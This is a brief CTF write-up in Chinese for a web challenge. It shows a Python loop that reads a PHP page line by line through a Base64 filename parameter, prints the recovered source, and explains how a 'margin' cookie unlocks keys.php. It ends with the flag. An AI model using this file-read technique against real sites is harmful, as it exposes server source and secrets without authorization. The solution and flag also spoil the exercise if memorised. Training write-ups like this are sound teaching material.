Description:
http://123.206.87.240:8002/web11/
答案格式:KEY{xxxxxxxx}
Solution:
打开网页,发现URL有一段Base64URL解码得keys.txt,试了一些方法之后,将index.php也Base64编码了一下,尝试用filename读取index.php发现出现了php的第一行,所以这里我选择用python遍历index.php
代码(经过测试,一共18行代码)import requests s = requests.session() for line in range(1, 19): url = 'http://123.206.87.240:8002/web11/index.php?line={}&filename=aW5kZXgucGhw'.format(line) print(s.get(url).text)
得到php代码error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); $file_list = array( '0' =>'keys.txt', '1' =>'index.php', ); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ $file_list[2]='keys.php'; } if(in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; } ?>
从php代码中可以看出来,我们需要将keys.php这段字符串Base64加密
a2V5cy5waHA=
然后将其作为filename的值,还要构造Cookie: margin=margin这个Cookie头完成任务!
Flag:
KEY{key_keys}